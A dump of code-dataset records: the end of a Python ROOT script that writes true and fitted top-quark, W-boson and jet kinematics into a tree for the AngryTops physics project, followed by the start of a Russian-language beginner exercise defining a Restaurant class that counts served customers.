)\nb_W_had_pz_true = array.array( 'f', [ -1.] )\nb_W_had_E_true = array.array( 'f', [ -1.] )\nb_W_had_m_true = array.array( 'f', [ -1.] )\nb_W_had_pt_true = array.array( 'f', [ -1.] )\nb_W_had_y_true = array.array( 'f', [ -1.] )\nb_W_had_phi_true = array.array( 'f', [ -1.] )\nb_b_had_px_true = array.array( 'f', [ -1.] )\nb_b_had_py_true = array.array( 'f', [ -1.] )\nb_b_had_pz_true = array.array( 'f', [ -1.] )\nb_b_had_E_true = array.array( 'f', [ -1.] )\nb_b_had_m_true = array.array( 'f', [ -1.] )\nb_b_had_pt_true = array.array( 'f', [ -1.] )\nb_b_had_y_true = array.array( 'f', [ -1.] )\nb_b_had_phi_true = array.array( 'f', [ -1.] )\nb_t_had_px_true = array.array( 'f', [ -1.] )\nb_t_had_py_true = array.array( 'f', [ -1.] )\nb_t_had_pz_true = array.array( 'f', [ -1.] )\nb_t_had_E_true = array.array( 'f', [ -1.] )\nb_t_had_m_true = array.array( 'f', [ -1.] )\nb_t_had_pt_true = array.array( 'f', [ -1.] )\nb_t_had_y_true = array.array( 'f', [ -1.] )\nb_t_had_phi_true = array.array( 'f', [ -1.] )\nb_W_lep_px_true = array.array( 'f', [ -1.] )\nb_W_lep_py_true = array.array( 'f', [ -1.] )\nb_W_lep_pz_true = array.array( 'f', [ -1.] )\nb_W_lep_E_true = array.array( 'f', [ -1.] )\nb_W_lep_m_true = array.array( 'f', [ -1.] )\nb_W_lep_pt_true = array.array( 'f', [ -1.] )\nb_W_lep_y_true = array.array( 'f', [ -1.] )\nb_W_lep_phi_true = array.array( 'f', [ -1.] )\nb_b_lep_px_true = array.array( 'f', [ -1.] )\nb_b_lep_py_true = array.array( 'f', [ -1.] )\nb_b_lep_pz_true = array.array( 'f', [ -1.] )\nb_b_lep_E_true = array.array( 'f', [ -1.] )\nb_b_lep_m_true = array.array( 'f', [ -1.] )\nb_b_lep_pt_true = array.array( 'f', [ -1.] )\nb_b_lep_y_true = array.array( 'f', [ -1.] )\nb_b_lep_phi_true = array.array( 'f', [ -1.] )\nb_t_lep_px_true = array.array( 'f', [ -1.] )\nb_t_lep_py_true = array.array( 'f', [ -1.] )\nb_t_lep_pz_true = array.array( 'f', [ -1.] )\nb_t_lep_E_true = array.array( 'f', [ -1.] )\nb_t_lep_m_true = array.array( 'f', [ -1.] )\nb_t_lep_pt_true = array.array( 'f', [ -1.] )\nb_t_lep_y_true = array.array( 'f', [ -1.] )\nb_t_lep_phi_true = array.array( 'f', [ -1.] )\n\nb_W_had_px_fitted = array.array( 'f', [ -1.] )\nb_W_had_py_fitted = array.array( 'f', [ -1.] )\nb_W_had_pz_fitted = array.array( 'f', [ -1.] )\nb_W_had_E_fitted = array.array( 'f', [ -1.] )\nb_W_had_m_fitted = array.array( 'f', [ -1.] )\nb_W_had_pt_fitted = array.array( 'f', [ -1.] )\nb_W_had_y_fitted = array.array( 'f', [ -1.] )\nb_W_had_phi_fitted = array.array( 'f', [ -1.] )\nb_b_had_px_fitted = array.array( 'f', [ -1.] )\nb_b_had_py_fitted = array.array( 'f', [ -1.] )\nb_b_had_pz_fitted = array.array( 'f', [ -1.] )\nb_b_had_E_fitted = array.array( 'f', [ -1.] )\nb_b_had_m_fitted = array.array( 'f', [ -1.] )\nb_b_had_pt_fitted = array.array( 'f', [ -1.] )\nb_b_had_y_fitted = array.array( 'f', [ -1.] )\nb_b_had_phi_fitted = array.array( 'f', [ -1.] )\nb_t_had_px_fitted = array.array( 'f', [ -1.] )\nb_t_had_py_fitted = array.array( 'f', [ -1.] )\nb_t_had_pz_fitted = array.array( 'f', [ -1.] )\nb_t_had_E_fitted = array.array( 'f', [ -1.] )\nb_t_had_m_fitted = array.array( 'f', [ -1.] )\nb_t_had_pt_fitted = array.array( 'f', [ -1.] )\nb_t_had_y_fitted = array.array( 'f', [ -1.] )\nb_t_had_phi_fitted = array.array( 'f', [ -1.] )\nb_W_lep_px_fitted = array.array( 'f', [ -1.] )\nb_W_lep_py_fitted = array.array( 'f', [ -1.] )\nb_W_lep_pz_fitted = array.array( 'f', [ -1.] )\nb_W_lep_E_fitted = array.array( 'f', [ -1.] )\nb_W_lep_m_fitted = array.array( 'f', [ -1.] )\nb_W_lep_pt_fitted = array.array( 'f', [ -1.] )\nb_W_lep_y_fitted = array.array( 'f', [ -1.] )\nb_W_lep_phi_fitted = array.array( 'f', [ -1.] )\nb_b_lep_px_fitted = array.array( 'f', [ -1.] )\nb_b_lep_py_fitted = array.array( 'f', [ -1.] )\nb_b_lep_pz_fitted = array.array( 'f', [ -1.] )\nb_b_lep_E_fitted = array.array( 'f', [ -1.] )\nb_b_lep_m_fitted = array.array( 'f', [ -1.] )\nb_b_lep_pt_fitted = array.array( 'f', [ -1.] )\nb_b_lep_y_fitted = array.array( 'f', [ -1.] )\nb_b_lep_phi_fitted = array.array( 'f', [ -1.] )\nb_t_lep_px_fitted = array.array( 'f', [ -1.] )\nb_t_lep_py_fitted = array.array( 'f', [ -1.] )\nb_t_lep_pz_fitted = array.array( 'f', [ -1.] )\nb_t_lep_E_fitted = array.array( 'f', [ -1.] )\nb_t_lep_m_fitted = array.array( 'f', [ -1.] )\nb_t_lep_pt_fitted = array.array( 'f', [ -1.] )\nb_t_lep_y_fitted = array.array( 'f', [ -1.] )\nb_t_lep_phi_fitted = array.array( 'f', [ -1.] )\n\nb_runNumber = array.array( 'i', [ -1] )\n\ntree = TTree( \"nominal\", \"nominal\" )\ntree.Branch( 'runNumber', b_runNumber, 'runNumber/i' )\n\ntree.Branch( 'jet1_px_obs', b_jet1_px_obs, 'jet1_px_obs/F')\ntree.Branch( 'jet1_py_obs', b_jet1_py_obs, 'jet1_py_obs/F')\ntree.Branch( 'jet1_pz_obs', b_jet1_pz_obs, 'jet1_pz_obs/F')\ntree.Branch( 'jet1_pt_obs', b_jet1_pt_obs, 'jet1_pt_obs/F')\ntree.Branch( 'jet1_E_obs', b_jet1_E_obs, 'jet1_E_obs/F')\ntree.Branch( 'jet1_m_obs', b_jet1_m_obs, 'jet1_m_obs/F')\ntree.Branch( 'jet1_btag_obs', b_jet1_btag_obs, 'jet1_btag_obs/F')\ntree.Branch( 'jet2_px_obs', b_jet2_px_obs, 'jet2_px_obs/F')\ntree.Branch( 'jet2_py_obs', b_jet2_py_obs, 'jet2_py_obs/F')\ntree.Branch( 'jet2_pz_obs', b_jet2_pz_obs, 'jet2_pz_obs/F')\ntree.Branch( 'jet2_pt_obs', b_jet2_pt_obs, 'jet2_pt_obs/F')\ntree.Branch( 'jet2_E_obs', b_jet2_E_obs, 'jet2_E_obs/F')\ntree.Branch( 'jet2_m_obs', b_jet2_m_obs, 'jet2_m_obs/F')\ntree.Branch( 'jet2_btag_obs', b_jet2_btag_obs, 'jet2_btag_obs/F')\ntree.Branch( 'jet3_px_obs', b_jet3_px_obs, 'jet3_px_obs/F')\ntree.Branch( 'jet3_py_obs', b_jet3_py_obs, 'jet3_py_obs/F')\ntree.Branch( 'jet3_pz_obs', b_jet3_pz_obs, 'jet3_pz_obs/F')\ntree.Branch( 'jet3_pt_obs', b_jet3_pt_obs, 'jet3_pt_obs/F')\ntree.Branch( 'jet3_E_obs', b_jet3_E_obs, 'jet3_E_obs/F')\ntree.Branch( 'jet3_m_obs', b_jet3_m_obs, 'jet3_m_obs/F')\ntree.Branch( 'jet3_btag_obs', b_jet3_btag_obs, 'jet3_btag_obs/F')\ntree.Branch( 'jet4_px_obs', b_jet4_px_obs, 'jet4_px_obs/F')\ntree.Branch( 'jet4_py_obs', b_jet4_py_obs, 'jet4_py_obs/F')\ntree.Branch( 'jet4_pz_obs', b_jet4_pz_obs, 'jet4_pz_obs/F')\ntree.Branch( 'jet4_pt_obs', b_jet4_pt_obs, 'jet4_pt_obs/F')\ntree.Branch( 'jet4_E_obs', b_jet4_E_obs, 'jet4_E_obs/F')\ntree.Branch( 'jet4_m_obs', b_jet4_m_obs, 'jet4_m_obs/F')\ntree.Branch( 'jet4_btag_obs', b_jet4_btag_obs, 'jet4_btag_obs/F')\ntree.Branch( 'jet5_px_obs', b_jet5_px_obs, 'jet5_px_obs/F')\ntree.Branch( 'jet5_py_obs', b_jet5_py_obs, 'jet5_py_obs/F')\ntree.Branch( 'jet5_pz_obs', b_jet5_pz_obs, 'jet5_pz_obs/F')\ntree.Branch( 'jet5_pt_obs', b_jet5_pt_obs, 'jet5_pt_obs/F')\ntree.Branch( 'jet5_E_obs', b_jet5_E_obs, 'jet5_E_obs/F')\ntree.Branch( 'jet5_m_obs', b_jet5_m_obs, 'jet5_m_obs/F')\ntree.Branch( 'jet5_btag_obs', b_jet5_btag_obs, 'jet5_btag_obs/F')\ntree.Branch( 'jetmu_px_obs', b_jetmu_px_obs, 'jetmu_px_obs/F')\ntree.Branch( 'jetmu_py_obs', b_jetmu_py_obs, 'jetmu_py_obs/F')\ntree.Branch( 'jetmu_pz_obs', b_jetmu_pz_obs, 'jetmu_pz_obs/F')\ntree.Branch( 'jetmu_T0_obs', b_jetmu_T0_obs, 'jetmu_T0_obs/F')\ntree.Branch( 'jetlep_ET_obs', b_jetlep_ET_obs, 'jetlep_ET_obs/F')\ntree.Branch( 'jetlep_phi_obs', b_jetlep_phi_obs, 'jetlep_phi_obs/F')\n\ntree.Branch( 'W_had_px_true', b_W_had_px_true, 'W_had_px_true/F' )\ntree.Branch( 'W_had_py_true', b_W_had_py_true, 'W_had_py_true/F' )\ntree.Branch( 'W_had_pz_true', b_W_had_pz_true, 'W_had_pz_true/F' )\ntree.Branch( 'W_had_E_true', b_W_had_E_true, 'W_had_E_true/F' )\ntree.Branch( 'W_had_m_true', b_W_had_m_true, 'W_had_m_true/F' )\ntree.Branch( 'W_had_pt_true', b_W_had_pt_true, 'W_had_pt_true/F' )\ntree.Branch( 'W_had_y_true', b_W_had_y_true, 'W_had_y_true/F' )\ntree.Branch( 'W_had_phi_true', b_W_had_phi_true, 'W_had_phi_true/F' )\ntree.Branch( 'b_had_px_true', b_b_had_px_true, 'b_had_px_true/F' )\ntree.Branch( 'b_had_py_true', b_b_had_py_true, 'b_had_py_true/F' )\ntree.Branch( 'b_had_pz_true', b_b_had_pz_true, 'b_had_pz_true/F' )\ntree.Branch( 'b_had_E_true', b_b_had_E_true, 'b_had_E_true/F' )\ntree.Branch( 'b_had_m_true', b_b_had_m_true, 'b_had_m_true/F' )\ntree.Branch( 'b_had_pt_true', b_b_had_pt_true, 'b_had_pt_true/F' )\ntree.Branch( 'b_had_y_true', b_b_had_y_true, 'b_had_y_true/F' )\ntree.Branch( 'b_had_phi_true', b_b_had_phi_true, 'b_had_phi_true/F' )\ntree.Branch( 't_had_px_true', b_t_had_px_true, 't_had_px_true/F' )\ntree.Branch( 't_had_py_true', b_t_had_py_true, 't_had_py_true/F' )\ntree.Branch( 't_had_pz_true', b_t_had_pz_true, 't_had_pz_true/F' )\ntree.Branch( 't_had_E_true', b_t_had_E_true, 't_had_E_true/F' )\ntree.Branch( 't_had_m_true', b_t_had_m_true, 't_had_m_true/F' )\ntree.Branch( 't_had_pt_true', b_t_had_pt_true, 't_had_pt_true/F' )\ntree.Branch( 't_had_y_true', b_t_had_y_true, 't_had_y_true/F' )\ntree.Branch( 't_had_phi_true', b_t_had_phi_true, 't_had_phi_true/F' )\ntree.Branch( 'W_lep_px_true', b_W_lep_px_true, 'W_lep_px_true/F' )\ntree.Branch( 'W_lep_py_true', b_W_lep_py_true, 'W_lep_py_true/F' )\ntree.Branch( 'W_lep_pz_true', b_W_lep_pz_true, 'W_lep_pz_true/F' )\ntree.Branch( 'W_lep_E_true', b_W_lep_E_true, 'W_lep_E_true/F' )\ntree.Branch( 'W_lep_m_true', b_W_lep_m_true, 'W_lep_m_true/F' )\ntree.Branch( 'W_lep_pt_true', b_W_lep_pt_true, 'W_lep_pt_true/F' )\ntree.Branch( 'W_lep_y_true', b_W_lep_y_true, 'W_lep_y_true/F' )\ntree.Branch( 'W_lep_phi_true', b_W_lep_phi_true, 'W_lep_phi_true/F' )\ntree.Branch( 'b_lep_px_true', b_b_lep_px_true, 'b_lep_px_true/F' )\ntree.Branch( 'b_lep_py_true', b_b_lep_py_true, 'b_lep_py_true/F' )\ntree.Branch( 'b_lep_pz_true', b_b_lep_pz_true, 'b_lep_pz_true/F' )\ntree.Branch( 'b_lep_E_true', b_b_lep_E_true, 'b_lep_E_true/F' )\ntree.Branch( 'b_lep_m_true', b_b_lep_m_true, 'b_lep_m_true/F' )\ntree.Branch( 'b_lep_pt_true', b_b_lep_pt_true, 'b_lep_pt_true/F' )\ntree.Branch( 'b_lep_y_true', b_b_lep_y_true, 'b_lep_y_true/F' )\ntree.Branch( 'b_lep_phi_true', b_b_lep_phi_true, 'b_lep_phi_true/F' )\ntree.Branch( 't_lep_px_true', b_t_lep_px_true, 't_lep_px_true/F' )\ntree.Branch( 't_lep_py_true', b_t_lep_py_true, 't_lep_py_true/F' )\ntree.Branch( 't_lep_pz_true', b_t_lep_pz_true, 't_lep_pz_true/F' )\ntree.Branch( 't_lep_E_true', b_t_lep_E_true, 't_lep_E_true/F' )\ntree.Branch( 't_lep_m_true', b_t_lep_m_true, 't_lep_m_true/F' )\ntree.Branch( 't_lep_pt_true', b_t_lep_pt_true, 't_lep_pt_true/F' )\ntree.Branch( 't_lep_y_true', b_t_lep_y_true, 't_lep_y_true/F' )\ntree.Branch( 't_lep_phi_true', b_t_lep_phi_true, 't_lep_phi_true/F' )\n\ntree.Branch( 'W_had_px_fitted', b_W_had_px_fitted, 'W_had_px_fitted/F' )\ntree.Branch( 'W_had_py_fitted', b_W_had_py_fitted, 'W_had_py_fitted/F' )\ntree.Branch( 'W_had_pz_fitted', b_W_had_pz_fitted, 'W_had_pz_fitted/F' )\ntree.Branch( 'W_had_E_fitted', b_W_had_E_fitted, 'W_had_E_fitted/F' )\ntree.Branch( 'W_had_m_fitted', b_W_had_m_fitted, 'W_had_m_fitted/F' )\ntree.Branch( 'W_had_pt_fitted', b_W_had_pt_fitted, 'W_had_pt_fitted/F' )\ntree.Branch( 'W_had_y_fitted', b_W_had_y_fitted, 'W_had_y_fitted/F' )\ntree.Branch( 'W_had_phi_fitted', b_W_had_phi_fitted, 'W_had_phi_fitted/F' )\ntree.Branch( 'b_had_px_fitted', b_b_had_px_fitted, 'b_had_px_fitted/F' )\ntree.Branch( 'b_had_py_fitted', b_b_had_py_fitted, 'b_had_py_fitted/F' )\ntree.Branch( 'b_had_pz_fitted', b_b_had_pz_fitted, 'b_had_pz_fitted/F' )\ntree.Branch( 'b_had_E_fitted', b_b_had_E_fitted, 'b_had_E_fitted/F' )\ntree.Branch( 'b_had_m_fitted', b_b_had_m_fitted, 'b_had_m_fitted/F' )\ntree.Branch( 'b_had_pt_fitted', b_b_had_pt_fitted, 'b_had_pt_fitted/F' )\ntree.Branch( 'b_had_y_fitted', b_b_had_y_fitted, 'b_had_y_fitted/F' )\ntree.Branch( 'b_had_phi_fitted', b_b_had_phi_fitted, 'b_had_phi_fitted/F' )\ntree.Branch( 't_had_px_fitted', b_t_had_px_fitted, 't_had_px_fitted/F' )\ntree.Branch( 't_had_py_fitted', b_t_had_py_fitted, 't_had_py_fitted/F' )\ntree.Branch( 't_had_pz_fitted', b_t_had_pz_fitted, 't_had_pz_fitted/F' )\ntree.Branch( 't_had_E_fitted', b_t_had_E_fitted, 't_had_E_fitted/F' )\ntree.Branch( 't_had_m_fitted', b_t_had_m_fitted, 't_had_m_fitted/F' )\ntree.Branch( 't_had_pt_fitted', b_t_had_pt_fitted, 't_had_pt_fitted/F' )\ntree.Branch( 't_had_y_fitted', b_t_had_y_fitted, 't_had_y_fitted/F' )\ntree.Branch( 't_had_phi_fitted', b_t_had_phi_fitted, 't_had_phi_fitted/F' )\ntree.Branch( 'W_lep_px_fitted', b_W_lep_px_fitted, 'W_lep_px_fitted/F' )\ntree.Branch( 'W_lep_py_fitted', b_W_lep_py_fitted, 'W_lep_py_fitted/F' )\ntree.Branch( 'W_lep_pz_fitted', b_W_lep_pz_fitted, 'W_lep_pz_fitted/F' )\ntree.Branch( 'W_lep_E_fitted', b_W_lep_E_fitted, 'W_lep_E_fitted/F' )\ntree.Branch( 'W_lep_m_fitted', b_W_lep_m_fitted, 'W_lep_m_fitted/F' )\ntree.Branch( 'W_lep_pt_fitted', b_W_lep_pt_fitted, 'W_lep_pt_fitted/F' )\ntree.Branch( 'W_lep_y_fitted', b_W_lep_y_fitted, 'W_lep_y_fitted/F' )\ntree.Branch( 'W_lep_phi_fitted', b_W_lep_phi_fitted, 'W_lep_phi_fitted/F' )\ntree.Branch( 'b_lep_px_fitted', b_b_lep_px_fitted, 'b_lep_px_fitted/F' )\ntree.Branch( 'b_lep_py_fitted', b_b_lep_py_fitted, 'b_lep_py_fitted/F' )\ntree.Branch( 'b_lep_pz_fitted', b_b_lep_pz_fitted, 'b_lep_pz_fitted/F' )\ntree.Branch( 'b_lep_E_fitted', b_b_lep_E_fitted, 'b_lep_E_fitted/F' )\ntree.Branch( 'b_lep_m_fitted', b_b_lep_m_fitted, 'b_lep_m_fitted/F' )\ntree.Branch( 'b_lep_pt_fitted', b_b_lep_pt_fitted, 'b_lep_pt_fitted/F' )\ntree.Branch( 'b_lep_y_fitted', b_b_lep_y_fitted, 'b_lep_y_fitted/F' )\ntree.Branch( 'b_lep_phi_fitted', b_b_lep_phi_fitted, 'b_lep_phi_fitted/F' )\ntree.Branch( 't_lep_px_fitted', b_t_lep_px_fitted, 't_lep_px_fitted/F' )\ntree.Branch( 't_lep_py_fitted', b_t_lep_py_fitted, 't_lep_py_fitted/F' )\ntree.Branch( 't_lep_pz_fitted', b_t_lep_pz_fitted, 't_lep_pz_fitted/F' )\ntree.Branch( 't_lep_E_fitted', b_t_lep_E_fitted, 't_lep_E_fitted/F' )\ntree.Branch( 't_lep_m_fitted', b_t_lep_m_fitted, 't_lep_m_fitted/F' )\ntree.Branch( 't_lep_pt_fitted', b_t_lep_pt_fitted, 't_lep_pt_fitted/F' )\ntree.Branch( 't_lep_y_fitted', b_t_lep_y_fitted, 't_lep_y_fitted/F' )\ntree.Branch( 't_lep_phi_fitted', b_t_lep_phi_fitted, 't_lep_phi_fitted/F' )\n\nfor i in range(n_events):\n if ( n_events < 10 ) or ( (i+1) % int(float(n_events)/10.) == 0 ):\n perc = 100. * i / float(n_events)\n print(\"INFO: Event %-9i (%3.0f %%)\" % ( i, perc ))\n\n \n\n W_had_true = MakeP4( y_true_W_had[i], m_W, representation)\n W_had_fitted = MakeP4( y_fitted_W_had[i], m_W, representation)\n\n W_lep_true = MakeP4( y_true_W_lep[i], m_W , representation)\n W_lep_fitted = MakeP4( y_fitted_W_lep[i], m_W, representation)\n\n b_had_true = MakeP4( y_true_b_had[i], m_b , representation)\n b_had_fitted = MakeP4( y_fitted_b_had[i], m_b , representation)\n\n b_lep_true = MakeP4( y_true_b_lep[i], m_b , representation)\n b_lep_fitted = MakeP4( y_fitted_b_lep[i], m_b, representation)\n\n t_had_true = MakeP4( y_true_t_had[i], m_t , representation)\n t_had_fitted = MakeP4( y_fitted_t_had[i], m_t , representation)\n\n t_lep_true = MakeP4( y_true_t_lep[i], m_t , representation)\n t_lep_fitted = MakeP4( y_fitted_t_lep[i], m_t, representation)\n\n jet_1_vect = MakeP4(jet_1[i], jet_1[i][4], representation)\n jet_2_vect = MakeP4(jet_2[i], jet_2[i][4], representation)\n jet_3_vect = MakeP4(jet_3[i], jet_3[i][4], representation)\n jet_4_vect = MakeP4(jet_4[i], jet_4[i][4], representation)\n jet_5_vect = MakeP4(jet_5[i], jet_5[i][4], representation)\n\n b_runNumber[0] = i\n \n b_jet1_px_obs[0] = jet_1_vect.Px()\n b_jet1_py_obs[0] = jet_1_vect.Py()\n b_jet1_pz_obs[0] = jet_1_vect.Pz()\n b_jet1_pt_obs[0] = jet_1_vect.Pt()\n b_jet1_E_obs [0] = jet_1_vect.E()\n b_jet1_m_obs [0] = jet_1_vect.M()\n b_jet1_btag_obs[0] = jet_1[i][5]\n b_jet2_px_obs[0] = jet_2_vect.Px()\n b_jet2_py_obs[0] = jet_2_vect.Py()\n b_jet2_pz_obs[0] = jet_2_vect.Pz()\n b_jet2_pt_obs[0] = jet_2_vect.Pt()\n b_jet2_E_obs [0] = jet_2_vect.E()\n b_jet2_m_obs [0] = jet_2_vect.M()\n b_jet2_btag_obs[0] = jet_2[i][5]\n b_jet3_px_obs[0] = jet_3_vect.Px()\n b_jet3_py_obs[0] = jet_3_vect.Py()\n b_jet3_pz_obs[0] = jet_3_vect.Pz()\n b_jet3_pt_obs[0] = jet_3_vect.Pt()\n b_jet3_E_obs [0] = jet_3_vect.E()\n b_jet3_m_obs [0] = jet_3_vect.M()\n b_jet3_btag_obs[0] = jet_3[i][5]\n b_jet4_px_obs[0] = jet_4_vect.Px()\n b_jet4_py_obs[0] = jet_4_vect.Py()\n b_jet4_pz_obs[0] = jet_4_vect.Pz()\n b_jet4_pt_obs[0] = jet_4_vect.Pt()\n b_jet4_E_obs [0] = jet_4_vect.E()\n b_jet4_m_obs [0] = jet_4_vect.M()\n b_jet4_btag_obs[0] = jet_4[i][5]\n b_jet5_px_obs[0] = jet_5_vect.Px()\n b_jet5_py_obs[0] = jet_5_vect.Py()\n b_jet5_pz_obs[0] = jet_5_vect.Pz()\n b_jet5_pt_obs[0] = jet_5_vect.Pt()\n b_jet5_E_obs [0] = jet_5_vect.E()\n b_jet5_m_obs [0] = jet_5_vect.M()\n b_jet5_btag_obs[0] = jet_5[i][5]\n b_jetmu_px_obs[0] = jet_mu[i][0]\n b_jetmu_py_obs[0] = jet_mu[i][1]\n b_jetmu_pz_obs[0] = jet_mu[i][2]\n b_jetmu_T0_obs [0] = jet_mu[i][3]\n b_jetlep_ET_obs [0] = jet_mu[i][4]\n b_jetlep_phi_obs[0] = jet_mu[i][5]\n\n # true\n\n b_W_had_px_true[0] = W_had_true.Px()\n b_W_had_py_true[0] = W_had_true.Py()\n b_W_had_pz_true[0] = W_had_true.Pz()\n b_W_had_E_true[0] = W_had_true.E()\n b_W_had_m_true[0] = W_had_true.M()\n b_W_had_pt_true[0] = W_had_true.Pt()\n b_W_had_y_true[0] = W_had_true.Rapidity()\n b_W_had_phi_true[0] = W_had_true.Phi()\n\n b_b_had_px_true[0] = b_had_true.Px()\n b_b_had_py_true[0] = b_had_true.Py()\n b_b_had_pz_true[0] = b_had_true.Pz()\n b_b_had_E_true[0] = b_had_true.E()\n b_b_had_m_true[0] = b_had_true.M()\n b_b_had_pt_true[0] = b_had_true.Pt()\n b_b_had_y_true[0] = b_had_true.Rapidity()\n b_b_had_phi_true[0] = b_had_true.Phi()\n\n b_t_had_px_true[0] = t_had_true.Px()\n b_t_had_py_true[0] = t_had_true.Py()\n b_t_had_pz_true[0] = t_had_true.Pz()\n b_t_had_E_true[0] = t_had_true.E()\n b_t_had_m_true[0] = t_had_true.M()\n b_t_had_pt_true[0] = t_had_true.Pt()\n b_t_had_y_true[0] = t_had_true.Rapidity()\n b_t_had_phi_true[0] = t_had_true.Phi()\n\n b_W_lep_px_true[0] = W_lep_true.Px()\n b_W_lep_py_true[0] = W_lep_true.Py()\n b_W_lep_pz_true[0] = W_lep_true.Pz()\n b_W_lep_E_true[0] = W_lep_true.E()\n b_W_lep_m_true[0] = W_lep_true.M()\n b_W_lep_pt_true[0] = W_lep_true.Pt()\n b_W_lep_y_true[0] = W_lep_true.Rapidity()\n b_W_lep_phi_true[0] = W_lep_true.Phi()\n\n b_b_lep_px_true[0] = b_lep_true.Px()\n b_b_lep_py_true[0] = b_lep_true.Py()\n b_b_lep_pz_true[0] = b_lep_true.Pz()\n b_b_lep_E_true[0] = b_lep_true.E()\n b_b_lep_m_true[0] = b_lep_true.M()\n b_b_lep_pt_true[0] = b_lep_true.Pt()\n b_b_lep_y_true[0] = b_lep_true.Rapidity()\n b_b_lep_phi_true[0] = b_lep_true.Phi()\n\n b_t_lep_px_true[0] = t_lep_true.Px()\n b_t_lep_py_true[0] = t_lep_true.Py()\n b_t_lep_pz_true[0] = t_lep_true.Pz()\n b_t_lep_E_true[0] = t_lep_true.E()\n b_t_lep_m_true[0] = t_lep_true.M()\n b_t_lep_pt_true[0] = t_lep_true.Pt()\n b_t_lep_y_true[0] = t_lep_true.Rapidity()\n b_t_lep_phi_true[0] = t_lep_true.Phi()\n\n # fitted\n\n b_W_had_px_fitted[0] = W_had_fitted.Px()\n b_W_had_py_fitted[0] = W_had_fitted.Py()\n b_W_had_pz_fitted[0] = W_had_fitted.Pz()\n b_W_had_E_fitted[0] = W_had_fitted.E()\n b_W_had_m_fitted[0] = W_had_fitted.M()\n b_W_had_pt_fitted[0] = W_had_fitted.Pt()\n b_W_had_y_fitted[0] = W_had_fitted.Rapidity()\n b_W_had_phi_fitted[0] = W_had_fitted.Phi()\n\n b_b_had_px_fitted[0] = b_had_fitted.Px()\n b_b_had_py_fitted[0] = b_had_fitted.Py()\n b_b_had_pz_fitted[0] = b_had_fitted.Pz()\n b_b_had_E_fitted[0] = b_had_fitted.E()\n b_b_had_m_fitted[0] = b_had_fitted.M()\n b_b_had_pt_fitted[0] = b_had_fitted.Pt()\n b_b_had_y_fitted[0] = b_had_fitted.Rapidity()\n b_b_had_phi_fitted[0] = b_had_fitted.Phi()\n\n b_t_had_px_fitted[0] = t_had_fitted.Px()\n b_t_had_py_fitted[0] = t_had_fitted.Py()\n b_t_had_pz_fitted[0] = t_had_fitted.Pz()\n b_t_had_E_fitted[0] = t_had_fitted.E()\n b_t_had_m_fitted[0] = t_had_fitted.M()\n b_t_had_pt_fitted[0] = t_had_fitted.Pt()\n b_t_had_y_fitted[0] = t_had_fitted.Rapidity()\n b_t_had_phi_fitted[0] = t_had_fitted.Phi()\n\n b_W_lep_px_fitted[0] = W_lep_fitted.Px()\n b_W_lep_py_fitted[0] = W_lep_fitted.Py()\n b_W_lep_pz_fitted[0] = W_lep_fitted.Pz()\n b_W_lep_E_fitted[0] = W_lep_fitted.E()\n b_W_lep_m_fitted[0] = W_lep_fitted.M()\n b_W_lep_pt_fitted[0] = W_lep_fitted.Pt()\n b_W_lep_y_fitted[0] = W_lep_fitted.Rapidity()\n b_W_lep_phi_fitted[0] = W_lep_fitted.Phi()\n\n b_b_lep_px_fitted[0] = b_lep_fitted.Px()\n b_b_lep_py_fitted[0] = b_lep_fitted.Py()\n b_b_lep_pz_fitted[0] = b_lep_fitted.Pz()\n b_b_lep_E_fitted[0] = b_lep_fitted.E()\n b_b_lep_m_fitted[0] = b_lep_fitted.M()\n b_b_lep_pt_fitted[0] = b_lep_fitted.Pt()\n b_b_lep_y_fitted[0] = b_lep_fitted.Rapidity()\n b_b_lep_phi_fitted[0] = b_lep_fitted.Phi()\n\n b_t_lep_px_fitted[0] = t_lep_fitted.Px()\n b_t_lep_py_fitted[0] = t_lep_fitted.Py()\n b_t_lep_pz_fitted[0] = t_lep_fitted.Pz()\n b_t_lep_E_fitted[0] = t_lep_fitted.E()\n b_t_lep_m_fitted[0] = t_lep_fitted.M()\n b_t_lep_pt_fitted[0] = t_lep_fitted.Pt()\n b_t_lep_y_fitted[0] = t_lep_fitted.Rapidity()\n b_t_lep_phi_fitted[0] = t_lep_fitted.Phi()\n\n tree.Fill()\n\ntree.Print()\nofile.Write ()\nofile.Close ()\n","repo_name":"mgwg/AngryTops","sub_path":"AngryTops/Plotting/jet_filter_tree.py","file_name":"jet_filter_tree.py","file_ext":"py","file_size_in_byte":26101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11215996939","text":"\"\"\"\r\nПосетители: начните с программы из упражнения 9.1. Добавьте атрибут \r\nnumber_served со значением по умолчанию 0; он представляет количество \r\nобслуженных посетителей. Создайте экземпляр с именем restaurant. Выведите \r\nзначение number_served, потом измените и выведите снова. Добавьте метод с именем\r\nset_number_served(), позволяющий задать количество обслуженных посетителей. \r\nВызовите метод с новым числом, снова выведите значение. Добавьте метод с именем \r\nincrement_number_served(), который увеличивает количество обслуженных \r\nпосетителей на заданную величину. Вызовите этот метод с любым числом, которое \r\nмогло бы представлять количество обслуженных клиентов — скажем, за один день. \r\n\"\"\"\r\n\r\nclass Restaurant():\r\n \"\"\"Простая модель ресторана.\"\"\"\r\n\r\n def __init__(self, restaurant_name, cuisine_type):\r\n self.restaurant_name = restaurant_name\r\n self.cuisine_type = cuisine_type\r\n self.number_served = 0\r\n \r\n def describe_restaurant(self):\r\n print(\"Название ресторана: \" + self.restaurant_name.title() + \".\")\r\n print(\"Тут вас ждет изумительная \" + self.cuisine_type + \" кухня!\")\r\n \r\n def open_restaurant(self):\r\n print(\"Ресторан \" + self.restaurant_name.title() + \" открыт!\")\r\n\r\n def read_number_served(self):\r\n \"\"\"Выводим кол-во обслуженных посетителей.\"\"\"\r\n print(\"Количество обслуженных посетителей: \" + \r\n str(self.number_served) + \".\")\r\n\r\n def set_number_served(self, num):\r\n \"\"\"Метод позволяет задать кол-во посетителей.\"\"\"\r\n if num >= self.number_served:\r\n self.number_served = num\r\n else:\r\n print(\"Вы не можете задать меньшее число пометителей!\")\r\n \r\n def increment_number_served(self, new_num):\r\n \"\"\"Метод изменяет кол-во посетителей с приращением.\"\"\"\r\n if new_num <= 0:\r\n print(\"Вы не можете уменьшать число посетителей!\")\r\n self.number_served += new_num\r\n else:\r\n self.number_served += new_num\r\n\r\nrestautant_1 = Restaurant('миямото', 'японская')\r\nrestautant_1.describe_restaurant()\r\nrestautant_1.open_restaurant()\r\nrestautant_1.number_served = 3\r\nrestautant_1.read_number_served()\r\nrestautant_1.number_served = 8\r\nrestautant_1.read_number_served()\r\n\r\nrestautant_2 = 